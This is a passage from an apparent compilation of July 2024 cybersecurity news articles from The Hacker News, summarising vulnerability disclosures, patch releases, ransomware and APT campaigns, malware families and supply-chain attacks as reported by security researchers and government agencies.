Such flaws arise when user input is not adequately sanitized and validated when constructing commands to be executed on the underlying operating system, thereby permitting an adversary to smuggle arbitrary commands that can lead to the deployment of malware or information theft.
"OS command injection vulnerabilities have long been preventable by clearly separating user input from the contents of a command," the agencies said. "Despite this finding, OS command injection vulnerabilities — many of which result from CWE-78 — are still a prevalent class of vulnerability."
The alert is the third such caution issued by CISA and FBI since the start of
the year. The agencies previously sent out two other alerts about the need for
eliminating SQL injection (SQLi) and path traversal vulnerabilities in March and
May 2024.
Last month, CISA, along with cybersecurity agencies from Canada and New Zealand,
also released guidance recommending businesses to adopt more robust security
solutions — such as Zero Trust, Secure Service Edge (SSE), and Secure Access
Service Edge (SASE) — that provide greater visibility of network activity.
"By using risk-based access control policies to deliver decisions through policy decision engines, these solutions integrate security and access control, strengthening an organization's usability and security through adaptive policies," the authoring agencies noted.
New Ransomware Group Exploiting Veeam Backup Software Vulnerability
11.7.24
Ransom
The Hacker News
A now-patched security flaw in Veeam Backup & Replication software is being
exploited by a nascent ransomware operation known as EstateRansomware.
Singapore-headquartered Group-IB, which discovered the threat actor in early April 2024, said the modus operandi involved the exploitation of CVE-2023-27532 (CVSS score: 7.5) to carry out the malicious activities.
Initial access to the target environment is said to have been facilitated by means of a Fortinet FortiGate firewall SSL VPN appliance using a dormant account.
"The threat actor pivoted laterally from the FortiGate Firewall through the SSL
VPN service to access the failover server," security researcher Yeo Zi Wei said
in an analysis published today.
"Before the ransomware attack, there were VPN brute-force attempts noted in
April 2024 using a dormant account identified as 'Acc1.' Several days later, a
successful VPN login using 'Acc1' was traced back to the remote IP address
149.28.106[.]252."
Next, the threat actors proceeded to establish RDP connections from the firewall to the failover server, followed by deploying a persistent backdoor named "svchost.exe" that's executed daily through a scheduled task.
Subsequent access to the network was accomplished using the backdoor to evade detection. The primary responsibility of the backdoor is to connect to a command-and-control (C2) server over HTTP and execute arbitrary commands issued by the attacker.
Group-IB said it observed the actor exploiting Veeam flaw CVE-2023-27532 with an aim to enable xp_cmdshell on the backup server and create a rogue user account named "VeeamBkp," alongside conducting network discovery, enumeration, and credential harvesting activities using tools like NetScan, AdFind, and NitSoft via the newly created account.
"This exploitation potentially involved an attack originating from the VeeamHax folder on the file server against the vulnerable version of Veeam Backup & Replication software installed on the backup server," Zi Wei hypothesized.
"This activity facilitated the activation of the xp_cmdshell stored procedure and subsequent creation of the 'VeeamBkp' account."
The attack culminated in the deployment of the ransomware, but not before taking
steps to impair defenses and moving laterally from the AD server to all other
servers and workstations using compromised domain accounts.
"Windows Defender was permanently disabled using DC.exe [Defender Control],
followed by ransomware deployment and execution with PsExec.exe," Group-IB said.
The disclosure comes as Cisco Talos revealed that most ransomware gangs
prioritize establishing initial access using security flaws in public-facing
applications, phishing attachments, or breaching valid accounts, and
circumventing defenses in their attack chains to increase dwell time in victim
networks.
The double extortion model of exfiltrating data prior to encrypting files has further given rise to custom tools developed by the actors (e.g., Exmatter, Exbyte, and StealBit) to send the confidential information to an adversary-controlled infrastructure.
This necessitates that these e-crime groups establish long-term access to explore the environment in order to understand the network's structure, locate resources that can support the attack, elevate their privileges, or allow them to blend in, and identify data of value that can be stolen.
"Over the past year, we have witnessed major shifts in the ransomware space with the emergence of multiple new ransomware groups, each exhibiting unique goals, operational structures and victimology," Talos said.
"The diversification highlights a shift toward more boutique-targeted cybercriminal activities, as groups such as Hunters International, Cactus, and Akira carve out specific niches, focusing on distinct operational goals and stylistic choices to differentiate themselves."
Chinese APT41 Upgrades Malware Arsenal with DodgeBox and MoonWalk
11.7.24
APT
The Hacker News
The China-linked advanced persistent threat (APT) group codenamed APT41 is
suspected to be using an "advanced and upgraded version" of a known malware
called StealthVector to deliver a previously undocumented backdoor dubbed
MoonWalk.
The new variant of StealthVector – which is also referred to as DUSTPAN – has been codenamed DodgeBox by Zscaler ThreatLabz, which discovered the loader strain in April 2024.
"DodgeBox is a loader that proceeds to load a new backdoor named MoonWalk," security researchers Yin Hong Chang and Sudeep Singh said. "MoonWalk shares many evasion techniques implemented in DodgeBox and utilizes Google Drive for command-and-control (C2) communication."
APT41 is the moniker assigned to a prolific state-sponsored threat actor
affiliated with China that's known to be active since at least 2007. It's also
tracked by the broader cybersecurity community under the names Axiom, Blackfly,
Brass Typhoon (formerly Barium), Bronze Atlas, Earth Baku, HOODOO, Red Kelpie,
TA415, Wicked Panda, and Winnti.
In September 2020, the U.S. Department of Justice (DoJ) announced the indictment
of several threat actors associated with the hacking crew for orchestrating
intrusion campaigns targeting more than 100 companies across the world.
"The intrusions [...] facilitated the theft of source code, software code signing certificates, customer account data, and valuable business information," the DoJ said at the time, adding they also enabled "other criminal schemes, including ransomware and 'crypto-jacking' schemes."
Over the past few years, the threat group has been linked to breaches of U.S. state government networks between May 2021 and February 2022, in addition to attacks targeting Taiwanese media organizations using an open-source red teaming tool known as Google Command and Control (GC2).
The use of StealthVector by APT41 was first documented by Trend Micro in August
2021, describing it as a shellcode loader written in C/C++ that's used to
deliver Cobalt Strike Beacon and a shellcode implant named ScrambleCross (aka
SideWalk).
DodgeBox is assessed to be an improved version of StealthVector, while also incorporating various techniques like call stack spoofing, DLL side-loading, and DLL hollowing to evade detection. The exact method by which the malware is distributed is presently unknown.
"APT41 employs DLL side-loading as a means of executing DodgeBox," the
researchers said. "They utilize a legitimate executable (taskhost.exe), signed
by Sandboxie, to sideload a malicious DLL (sbiedll.dll)."
The rogue DLL (i.e., DodgeBox) is a DLL loader written in C that acts as a
conduit to decrypt and launch a second-stage payload, the MoonWalk backdoor.
The attribution of DodgeBox to APT41 stems from the similarities between DodgeBox and StealthVector; the use of DLL side-loading, a technique widely used by China-nexus groups to deliver malware such as PlugX; and the fact that DodgeBox samples have been submitted to VirusTotal from Thailand and Taiwan.
"DodgeBox is a newly identified malware loader that employs multiple techniques to evade both static and behavioral detection," the researchers said.
"It offers various capabilities, including decrypting and loading embedded DLLs, conducting environment checks and bindings, and executing cleanup procedures."
New Poco RAT Targets Spanish-Speaking Victims in Phishing Campaign
11.7.24
Virus
The Hacker News
Spanish language victims are the target of an email phishing campaign that
delivers a new remote access trojan (RAT) called Poco RAT since at least
February 2024.
The attacks primarily single out mining, manufacturing, hospitality, and utilities sectors, according to cybersecurity company Cofense.
"The majority of the custom code in the malware appears to be focused on anti-analysis, communicating with its command-and-control center (C2), and downloading and running files with a limited focus on monitoring or harvesting credentials," it said.
Infection chains begin with phishing messages bearing finance-themed lures that trick recipients into clicking on an embedded URL pointing to a 7-Zip archive file hosted on Google Drive.
Other methods observed include the use of HTML or PDF files directly attached to
the emails or downloaded via another embedded Google Drive link. The abuse of
legitimate services by threat actors is not a new phenomenon as it allows them
to bypass secure email gateways (SEGs).
The HTML files propagating Poco RAT, in turn, contain a link that, upon
clicking, leads to the download of the archive containing the malware
executable.
"This tactic would likely be more effective than simply providing a URL to directly download the malware as any SEGs that would explore the embedded URL would only download and check the HTML file, which would appear to be legitimate," Cofense noted.
The PDF files are no different in that they also contain a Google Drive link that harbors Poco RAT.
Once launched, the Delphi-based malware establishes persistence on the compromised Windows host and contacts a C2 server in order to deliver additional payloads. It's so named owing to its use of the POCO C++ Libraries.
The use of Delphi is a sign that the unidentified threat actors behind the campaign are focusing on Latin America, which is known to be targeted by banking trojans written in the programming language.
This connection is strengthened by the fact that the C2 server does not respond
to requests originating from infected computers that are not geolocated to the
region.
The development comes as malware authors are increasingly using QR codes
embedded with PDF files to trick users into visiting phishing pages that are
designed to harvest Microsoft 365 login credentials.
It also follows social engineering campaigns that use deceptive sites
advertising popular software to deliver malware such as RATs and information
stealers like AsyncRAT and RisePro.
Similar data theft attacks have also targeted internet users in India with bogus SMS messages falsely claiming of package delivery failures and instructing them to click on a provided link to update their details.
The SMS phishing campaign has been attributed to a Chinese-speaking threat actor called Smishing Triad, which has a history of using compromised or purposefully registered Apple iCloud accounts (e.g., "fredyma514@hlh-web.de") to send smishing messages for carrying out financial fraud.
"The actors registered domain names impersonating the India Post around June, but were not actively using them, likely preparing for a large-scale activity, which became visible by July," Resecurity said. "The goal of this campaign is to steal massive amounts of personal identifiable information (PII) and payment data."
Microsoft's July Update Patches 143 Flaws, Including Two Actively Exploited
10.7.24
OS
The Hacker News
Microsoft has released patches to address a total of 143 security flaws as part
of its monthly security updates, two of which have come under active
exploitation in the wild.
Five out of the 143 flaws are rated Critical, 136 are rated Important, and four are rated Moderate in severity. The fixes are in addition to 33 vulnerabilities that have been addressed in the Chromium-based Edge browser over the past month.
The two security shortcomings that have come under exploitation are below -
CVE-2024-38080 (CVSS score: 7.8) - Windows Hyper-V
Elevation of Privilege Vulnerability
CVE-2024-38112 (CVSS score: 7.5) - Windows MSHTML Platform Spoofing
Vulnerability
"Successful exploitation of this vulnerability requires an attacker to take
additional actions prior to exploitation to prepare the target environment,"
Microsoft said of CVE-2024-38112. "An attacker would have to send the victim a
malicious file that the victim would have to execute."
Check Point security researcher Haifei Li, who has been
credited with discovering and reporting the flaw in May 2024, said that threat
actors are leveraging specially-crafted Windows Internet Shortcut files (.URL)
that, upon clicking, redirects victims to a malicious URL by invoking the
retired Internet Explorer (IE) browser.
"An additional trick on IE is used to hide the malicious .HTA extension name,"
Li explained. "By opening the URL with IE instead of the modern and much more
secure Chrome/Edge browser on Windows, the attacker gained significant
advantages in exploiting the victim's computer, although the computer is running
the modern Windows 10/11 operating system."
"CVE-2024-38080 is an elevation of privilege flaw in Windows Hyper-V," Satnam Narang, senior staff research engineer at Tenable, said. "A local, authenticated attacker could exploit this vulnerability to elevate privileges to SYSTEM level following an initial compromise of a targeted system."
While the exact specifics surrounding the abuse of CVE-2024-38080 is currently unknown, Narang noted that this is the first of the 44 Hyper-V flaws to come under exploitation in the wild since 2022.
Two other security flaws patched by Microsoft have been listed as publicly known at the time of the release. This includes a side-channel attack called FetchBench (CVE-2024-37985, CVSS score: 5.9) that could enable an adversary to view heap memory from a privileged process running on Arm-based systems.
The second publicly disclosed vulnerability in question is CVE-2024-35264 (CVSS score: 8.1), a remote code execution bug impacting .NET and Visual Studio.
"An attacker could exploit this by closing an http/3 stream while the request body is being processed leading to a race condition," Redmond said in an advisory. "This could result in remote code execution."
Also resolved as part of Patch Tuesday updates are 37 remote code execution flaws affecting the SQL Server Native Client OLE DB Provider, 20 Secure Boot security feature bypass vulnerabilities, three PowerShell privilege escalation bugs, and a spoofing vulnerability in the RADIUS protocol (CVE-2024-3596 aka BlastRADIUS).
"[The SQL Server flaws] specifically affect the OLE DB Provider, so not only do SQL Server instances need to be updated, but client code running vulnerable versions of the connection driver will also need to be addressed," Rapid7's Lead Product Manager Greg Wiseman said.
"For example, an attacker could use social engineering tactics to dupe an authenticated user into attempting to connect to a SQL Server database configured to return malicious data, allowing arbitrary code execution on the client."
Rounding off the long list of patches is CVE-2024-38021 (CVSS score: 8.8), a remote code execution flaw in Microsoft Office that, if successfully exploited, could permit an attacker to gain high privileges, including read, write, and delete functionality.
Morphisec, which reported the flaw to Microsoft in late April 2024, said the vulnerability does not require any authentication and poses a severe risk due to its zero-click nature.
"Attackers could exploit this vulnerability to gain unauthorized access, execute
arbitrary code, and cause substantial damage without any user interaction,"
Michael Gorelik said. "The absence of authentication requirements makes it
particularly dangerous, as it opens the door to widespread exploitation."
The fixes come as Microsoft announced late last month that it will begin issuing
CVE identifiers for cloud-related security vulnerabilities going forward in an
attempt to improve transparency.
Google Adds Passkeys to Advanced
Protection Program for High-Risk Users
10.7.24
Safety
The Hacker News
Google on Wednesday announced that it's making available passkeys for high-risk
users to enroll in its Advanced Protection Program (APP).
"Users traditionally needed a physical security key for APP — now they can choose a passkey to secure their account," Shuvo Chatterjee, product lead of APP, said.
Passkeys are considered a more secure and
phishing-resistant alternative to passwords. Based on the FIDO Authentication
standard, the technology is designed to secure online accounts against potential
takeover attacks by ditching passwords in favor of biometrics or a PIN.
Passkeys can simultaneously act as a first- and second-factor, entirely
obviating the need for a password. Earlier this May, the tech giant revealed
that passkeys are being used by over 400 million Google accounts.
High-risk users, who are at an elevated exposure to cyber-attacks because of who they are and what they do (e.g., journalists, elected officials, political campaign staff, human rights workers, and business leaders), can check if they have a compatible device and browser and complete the enrollment process.
"We also require you to add recovery options during enrollment (e.g. a phone number and email, or another passkey or security key), a combination of which will help you regain access to your account if you get locked out," Chatterjee said.
Google further said it's partnering with Internews to
provide journalists and human rights workers with security support. The program
spans 10 countries, including Brazil, Mexico, and Poland.
The development comes as Google said it intends to expand dark web reports to
any user with a Google account starting later this month to check if their
information has been leaked on the darknet. The feature was previously limited
to Google One subscribers.
"Dark web report will become available to all users with a consumer Google Account," it noted in a support document. "Dark web report is integrated with Results about you as a combined solution to help users protect their online presence."
HuiOne Guarantee: The $11 Billion
Cybercrime Hub of Southeast Asia
10.7.24
Cryptocurrency
The Hacker News
Cryptocurrency analysts have shed light on an online marketplace called HuiOne
Guarantee that's widely used by cybercriminals in Southeast Asia, particularly
those linked to pig butchering scams.
"Merchants on the platform offer technology, data, and money laundering services, and have engaged in transactions totaling at least $11 billion," Elliptic said in a report shared with The Hacker News.
The British blockchain analytics firm said that the
marketplace is part of HuiOne Group, a Cambodian conglomerate with links to
Cambodia's ruling Hun family and that another HuiOne business, HuiOne
International Payments, is actively involved in laundering scam proceeds
globally.
According to its website, HuiOne's financial services arm is said to have
500,000 registered users. It also touts Alipay, Huawei, PayGo Wallet, UnionPay,
and Yes Seatel as its customers.
Southeast Asian countries like Burma, Cambodia, Laos, Malaysia, Myanmar, and the Philippines have become a breeding ground for pig butchering scams in recent years.
In these schemes, unwitting people from Asia and Africa are enticed with
high-paying jobs in the region, only for them to be trapped inside "scam
compounds" run by transnational organized crime groups originating from China
and coerced into participating in fraudulent activities.
These entail creating fake accounts on social media and dating platforms, and using them to develop romantic relationships with victims and eventually persuade them to invest in non-existent crypto businesses with an aim to siphon their funds.
HuiOne Guarantee, established in 2021, comprises a network of thousands of instant messaging app channels on Telegram that are run by different merchants. While it claims to serve as a marketplace for real estate and cars, Elliptic said that a majority of the goods and services offered are aimed at cyber scam operators.
"The largest category of merchants operating on HuiOne Guarantee are those
offering to move and exchange money," the company explained.
"Many of the merchants explicitly offer money laundering services, including
accepting payments from victims around the world, transferring it across borders
and converting it to other assets including cash, stablecoins, and to Chinese
payment apps."
Merchants have also been found advertising software and web development services that facilitate the creation of scam crypto investment websites used in pig butchering scams, as well as marketing tear gas, electric batons and electronic shackles for use by scam compound operators to imprison and torture their workers.
According to data shared by SlowMist earlier this January, merchants associated with HuiOne Guarantee – which is also referred to as Huiwang Guarantee – are said to have further engaged in cryptocurrency transactions with a wallet that received more than 4.6 million USDT from another wallet linked to the Myanmar Alliance Army.
"The value of cryptocurrency received by HuiOne Guarantee and its merchants, and the type of goods and services offered, suggest that it is a key enabler of cyber scam operators in Southeast Asia," Elliptic said.
ViperSoftX Malware Disguises as
eBooks on Torrents to Spread Stealthy Attacks
10.7.24
Virus
The Hacker News
The sophisticated malware known as ViperSoftX has been observed being
distributed as eBooks over torrents.
"A notable aspect of the current variant of ViperSoftX is that it uses the Common Language Runtime (CLR) to dynamically load and run PowerShell commands, thereby creating a PowerShell environment within AutoIt for operations," Trellix security researchers Mathanraj Thangaraju and Sijo Jacob said.
"By utilizing CLR, ViperSoftX can seamlessly integrate PowerShell functionality,
allowing it to execute malicious functions while evading detection mechanisms
that might otherwise flag standalone PowerShell activity."
Initially detected by Fortinet in 2020, ViperSoftX is known for its ability to
exfiltrate sensitive information from compromised Windows hosts. Over the years,
the malware has become a relevant example of threat actors continuously
innovating their tactics in an attempt to stay stealthy and circumvent defenses.
This is exemplified by the increased complexity and the adoption of advanced anti-analysis techniques such as byte remapping and web browser communication blocking, as documented by Trend Micro in April 2023.
As recently as May 2024, malicious campaigns have leveraged ViperSoftX as a delivery vehicle to distribute Quasar RAT and another information stealer named TesseractStealer.
Attack chains propagating the malware are known to employ cracked software and torrent sites, but the use of eBook lures is a newly observed approach. Present within the supposed eBook RAR archive file is a hidden folder as well as a deceptive Windows shortcut file that purports to be a benign document.
Executing the shortcut file initiates a multi-stage infection sequence that begins with the extraction of PowerShell code that unhides the concealed folder and sets up persistence on the system to launch an AutoIt script that, in turn, interacts with the .NET CLR framework, to decrypt and run a secondary PowerShell script, which is ViperSoftX.
"AutoIt does not by default support the .NET Common Language Runtime (CLR)," the
researchers said. "However, the language's user-defined functions (UDF) offer a
gateway to the CLR library, granting malevolent actors access to PowerShell's
formidable capabilities."
ViperSoftX harvests system information, scans for cryptocurrency wallets via
browser extensions, captures clipboard contents, and dynamically downloads and
runs additional payloads and commands based on responses received from a remote
server. It also comes with self-deletion mechanisms to challenge detection.
"One of the hallmark features of ViperSoftX is its adept use of the Common Language Runtime (CLR) to orchestrate PowerShell operations within the AutoIt environment," the researchers said. "This integration enables seamless execution of malicious functions while evading detection mechanisms that would typically flag standalone PowerShell activity."
"Furthermore, ViperSoftX's ability to patch the Antimalware Scan Interface (AMSI) before executing PowerShell scripts underscores its determination to circumvent traditional security measures."
New OpenSSH Vulnerability
Discovered: Potential Remote Code Execution Risk
10.7.24
Vulnerebility
The Hacker News
Select versions of the OpenSSH secure networking suite are susceptible to a new
vulnerability that can trigger remote code execution (RCE).
The vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1 and 8.8p1 shipped with Red Hat Enterprise Linux 9.
Security researcher Alexander Peslyak, who goes by the alias Solar Designer, has been credited with discovering and reporting the bug, which was found during a review of CVE-2024-6387 after the latter was disclosed by Qualys earlier this month.
"The main difference from CVE-2024-6387 is that the race condition and RCE potential are triggered in the privsep child process, which runs with reduced privileges compared to the parent server process," Peslyak said.
"So the immediate impact is lower. However, there may be differences in exploitability of these vulnerabilities in a particular scenario, which could make either one of these a more attractive choice for an attacker, and if only one of these is fixed or mitigated then the other becomes more relevant."
However, it's worth noting that the signal handler race condition vulnerability is the same as CVE-2024-6387, wherein if a client does not authenticate within LoginGraceTime seconds (120 by default), then the OpenSSH daemon process' SIGALRM handler is called asynchronously, which then invokes various functions that are not async-signal-safe.
"This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server," according to the vulnerability description.
"As a consequence of a successful attack, in the worst case scenario, the attacker may be able to perform a remote code execution (RCE) within unprivileged user running the sshd server."
An active exploit for CVE-2024-6387 has since been detected in the wild, with an unknown threat actor targeting servers primarily located in China.
"The initial vector of this attack originates from the IP address 108.174.58[.]28, which was reported to host a directory listing exploit tools and scripts for automating the exploitation of vulnerable SSH servers," Israeli cybersecurity company Veriti said.
RADIUS Protocol Vulnerability
Exposes Networks to MitM Attacks
9.7.24
Attack
The Hacker News
Cybersecurity researchers have discovered a security vulnerability in the RADIUS
network authentication protocol called BlastRADIUS that could be exploited by an
attacker to stage Mallory-in-the-middle (MitM) attacks and bypass integrity
checks under certain circumstances.
"The RADIUS protocol allows certain Access-Request messages to have no integrity or authentication checks," InkBridge Networks CEO Alan DeKok, who is the creator of the FreeRADIUS Project, said in a statement.
"As a result, an attacker can modify these packets without detection. The attacker would be able to force any user to authenticate, and to give any authorization (VLAN, etc.) to that user."
RADIUS, short for Remote Authentication Dial-In User Service, is a client/server protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.
The security of RADIUS is reliant on a hash that's derived using the MD5 algorithm, which has been deemed cryptographically broken as of December 2008 owing to the risk of collision attacks.
This means that the Access-Request packets can be subjected to what's called a chosen prefix attack that makes it possible to modify the response packet such that it passes all of the integrity checks for the original response.
However, for the attack to succeed, the adversary has to be able to modify
RADIUS packets in transit between the RADIUS client and server. This also means
that organizations that send packets over the internet are at risk of the flaw.
Other mitigation factors that prevent the attack from being potent stem from the
use of TLS to transmit RADIUS traffic over the internet and increased packet
security via the Message-Authenticator attribute.
BlastRADIUS is the result of a fundamental design flaw and is said to impact all standards-compliant RADIUS clients and servers, making it imperative that internet service providers (ISPs) and organizations that use the protocol update to the latest version.
"Specifically, PAP, CHAP, and MS-CHAPv2 authentication methods are the most vulnerable," DeKok said. "ISPs will have to upgrade their RADIUS servers and networking equipment."
"Anyone using MAC address authentication, or RADIUS for administrator logins to switches is vulnerable. Using TLS or IPSec prevents the attack, and 802.1X (EAP) is not vulnerable."
For enterprises, the attacker would already need to have access to the management virtual local area network (VLAN). What's more, ISPs can be susceptible if they send RADIUS traffic over intermediate networks, such as third-party outsourcers, or the wider internet.
It's worth noting that the vulnerability, which carries a CVSS score of 9.0, particularly affects networks that send RADIUS/UDP traffic over the internet given that "most RADIUS traffic is sent 'in the clear.'" There is no evidence that it's being exploited in the wild.
"This attack is the result of the security of the RADIUS protocol being neglected for a very long time," DeKok said.
"While the standards have long suggested protections which would have prevented the attack, those protections were not made mandatory. In addition, many vendors did not even implement the suggested protections."
Hackers Exploiting Jenkins Script
Console for Cryptocurrency Mining Attacks
9.7.24
Cryptocurrency
The Hacker News
Cybersecurity researchers have found that it's possible for attackers to
weaponize improperly configured Jenkins Script Console instances to further
criminal activities such as cryptocurrency mining.
"Misconfigurations such as improperly set up authentication mechanisms expose the '/script' endpoint to attackers," Trend Micro's Shubham Singh and Sunil Bharti said in a technical write-up published last week. "This can lead to remote code execution (RCE) and misuse by malicious actors."
Jenkins, a popular continuous integration and continuous delivery (CI/CD) platform, features a Groovy script console that allows users to run arbitrary Groovy scripts within the Jenkins controller runtime.
The project maintainers, in the official documentation, explicitly note that the web-based Groovy shell can be used to read files containing sensitive data (e.g., "/etc/passwd"), decrypt credentials configured within Jenkins, and even reconfigure security settings.
The console "offers no administrative controls to stop a user (or admin) once they are able to execute the Script Console from affecting all parts of the Jenkins infrastructure," reads the documentation. "Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins."
While access to Script Console is typically limited only to authenticated users with administrative permissions, misconfigured Jenkins instances could inadvertently make the "/script" (or "/scriptText") endpoint accessible over the internet, making it ripe for exploitation by attackers looking to run dangerous commands.
Trend Micro said it found instances of threat actors exploiting the Jenkins Groovy plugin misconfiguration to execute a Base64-encoded string containing a malicious script that's designed to mine cryptocurrency on the compromised server by deploying a miner payload hosted on berrystore[.]me and setting up persistence.
"The script ensures it has enough system resources to perform the mining effectively," the researchers said. "To do this, the script checks for processes that consume more than 90% of the CPU's resources, then proceeds to kill these processes. Furthermore, it will terminate all stopped processes."
To safeguard against such exploitation attempts, it's advised to ensure proper configuration, implement robust authentication and authorization, conduct regular audits, and restrict Jenkins servers from being publicly exposed on the internet.
The development comes as cryptocurrency thefts arising from hacks and exploits have surged in the first half of 2024, allowing threat actors to plunder $1.38 billion, up from $657 million year-over-year.
"The top five hacks and exploits accounted for 70% of the total amount stolen so far this year," blockchain intelligence platform TRM Labs said. "Private key and seed phrase compromises remain a top attack vector in 2024, alongside smart contract exploits and flash loan attacks."
GuardZoo Malware Targets Over 450
Middle Eastern Military Personnel
9.7.24
Virus
The Hacker News
Military personnel from Middle East countries are the target of an ongoing surveillanceware operation that delivers an Android data-gathering tool called GuardZoo.
The campaign, believed to have commenced as early as October 2019, has been
attributed to a Houthi-aligned threat actor based on the application lures,
command-and-control (C2) server logs, targeting footprint, and the attack
infrastructure location, according to Lookout.
More than 450 victims have been impacted by the malicious activity, with targets
located in Egypt, Oman, Qatar, Saudi Arabia, Turkey, the U.A.E., and Yemen.
Telemetry data indicates that most of the infections have been recorded in
Yemen.
GuardZoo is a modified version of an Android remote access trojan (RAT) named
Dendroid RAT that was first discovered by Broadcom-owned Symantec in March 2014.
The entire source code associated with the crimeware solution was leaked later
that August.
Originally marketed as a commodity malware for a one-off price of $300, it comes with capabilities to call a phone number, delete call logs, open web pages, record audio and calls, access SMS messages, take and upload photos and videos, and even initiate an HTTP flood attack.
"However, many changes were made to the code base in order to add new
functionalities and remove unused functions," Lookout researchers Alemdar
Islamoglu and Kyle Schmittle said in a report shared with The Hacker News.
"GuardZoo doesn't use the leaked PHP web panel from Dendroid RAT for Command and
Control (C2) but instead uses a new C2 backend created with ASP.NET."
Attack chains distributing GuardZoo leverage WhatsApp and WhatsApp Business as
distribution vectors, with the initial infections also taking place via direct
browser downloads. The booby-trapped Android apps bear military and religious
themes to entice users into downloading them.
The updated version of the malware supports more than 60 commands that allow it to fetch additional payloads, download files and APKs, upload files (PDF, DOC, DOCX, XLX, XLSX, and PPT), and images, change C2 address, and terminate, update, or delete itself from the compromised device.
"GuardZoo has been using the same dynamic DNS domains for C2 operations since October 2019," the researchers said. "These domains resolve to IP addresses registered to YemenNet and they change regularly."
Cybersecurity Agencies Warn of
China-linked APT40's Rapid Exploit Adaptation
9.7.24
APT
The Hacker News
Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand,
South Korea, the U.K., and the U.S. have released a joint advisory about a
China-linked cyber espionage group called APT40, warning about its ability to
co-opt exploits for newly disclosed security flaws within hours or days of
public release.
"APT40 has previously targeted organizations in various countries, including Australia and the United States," the agencies said. "Notably, APT40 possesses the ability to quickly transform and adapt vulnerability proofs-of-concept (PoCs) for targeting, reconnaissance, and exploitation operations."
The adversarial collective, also known as Bronze Mohawk, Gingham Typhoon
(formerly Gadolinium), ISLANDDREAMS, Kryptonite Panda, Leviathan, Red Ladon,
TA423, and TEMP.Periscope, is known to be active since at least 2013, carrying
out cyber attacks targeting entities in the Asia-Pacific region. It's assessed
to be based in Haikou.
In July 2021, the U.S. and its allies officially attributed the group as
affiliated with China's Ministry of State Security (MSS), indicting several
members of the hacking crew for orchestrating a multiyear campaign aimed at
different sectors to facilitate the theft of trade secrets, intellectual
property, and high-value information.
Over the past few years, APT40 has been linked to intrusion waves delivering the ScanBox reconnaissance framework as well as the exploitation of a security flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) as part of a phishing campaign targeting Papua New Guinea to deliver a backdoor dubbed BOXRAT.
Then earlier this March, the New Zealand government implicated the threat actor to the compromise of the Parliamentary Counsel Office and the Parliamentary Service in 2021.
"APT40 identifies new exploits within widely used public software such as Log4j,
Atlassian Confluence, and Microsoft Exchange to target the infrastructure of the
associated vulnerability," the authoring agencies said.
"APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies' countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits."
Notable among the tradecraft employed by the state-sponsored hacking crew is the
deployment of web shells to establish persistence and maintain access to the
victim's environment, as well as its use of Australian websites for
command-and-control (C2) purposes.
It has also been observed incorporating out-of-date or unpatched devices,
including small-office/home-office (SOHO) routers, as part of its attack
infrastructure in an attempt to reroute malicious traffic and evade detection,
an operational style that is akin to that used by other China-based groups like
Volt Typhoon.
According to Google-owned Mandiant, this is part of a broader transition in cyber espionage activity originating from China that aims to put stealth front and center by increasingly weaponizing network edge devices, operational relay box (ORB) networks, and living-off-the-land (LotL) techniques to fly under the radar.
Attack chains further involve carrying out reconnaissance, privilege escalation, and lateral movement activities using the remote desktop protocol (RDP) to steal credentials and exfiltrate information of interest.
To mitigate the risks posed by such threats, organizations are recommended to maintain adequate logging mechanisms, enforce multi-factor authentication (MFA), implement a robust patch management system, replace end-of-life equipment, disable unused services, ports, and protocols, and segment networks to prevent access to sensitive data.
Trojanized jQuery Packages Found on
npm, GitHub, and jsDelivr Code Repositories
9.7.24
Virus
The Hacker News
Unknown threat actors have been found propagating trojanized versions of jQuery
on npm, GitHub, and jsDelivr in what appears to be an instance of a "complex and
persistent" supply chain attack.
"This attack stands out due to the high variability across packages," Phylum said in an analysis published last week.
"The attacker has cleverly hidden the malware in the seldom-used 'end' function of jQuery, which is internally called by the more popular 'fadeTo' function from its animation utilities."
As many as 68 packages have been linked to the campaign. They were published to the npm registry starting from May 26 to June 23, 2024, using names such as cdnjquery, footersicons, jquertyi, jqueryxxx, logoo, and sytlesheets, among others.
There is evidence to suggest that each of the bogus packages were manually assembled and published due to the sheer number of packages published from various accounts, the differences in naming conventions, the inclusion of personal files, and the long time period over which they were uploaded.
This is unlike other commonly observed methods in which attackers tend to follow a predefined pattern that underscores an element of automation involved in creating and publishing the packages.
The malicious changes, per Phylum, have been introduced in a function named "end," allowing the threat actor to exfiltrate website form data to a remote URL.
Further investigation has found the trojanized jQuery file to be hosted on a GitHub repository associated with an account called "indexsc." Also present in the same repository are JavaScript files containing a script pointing to the modified version of the library.
"It's worth noting that jsDelivr constructs these GitHub URLs automatically without needing to upload anything to the CDN explicitly," Phylum said.
"This is likely an attempt by the attacker to make the source look more legitimate or to sneak through firewalls by using jsDelivr instead of loading the code directly from GitHub itself."
The development comes as Datadog identified a series of packages on the Python Package Index (PyPI) repository with capabilities to download a second-stage binary from an attacker-controlled server depending on the CPU architecture.
New APT Group "CloudSorcerer"
Targets Russian Government Entities
8.7.24
APT
The Hacker News
A previously undocumented advanced persistent threat (APT) group dubbed
CloudSorcerer has been observed targeting Russian government entities by
leveraging cloud services for command-and-control (C2) and data exfiltration.
Cybersecurity firm Kaspersky, which discovered the activity in May 2024, the tradecraft adopted by the threat actor bears similarities with that of CloudWizard, but pointed out the differences in the malware source code. The attacks wield an innovative data-gathering program and a slew of evasion tactics for covering its tracks.
"It's a sophisticated cyber espionage tool used for stealth monitoring, data collection, and exfiltration via Microsoft Graph, Yandex Cloud, and Dropbox cloud infrastructure," the Russian security vendor said.
"The malware leverages cloud resources as its command and control (C2) servers, accessing them through APIs using authentication tokens. Additionally, CloudSorcerer uses GitHub as its initial C2 server."
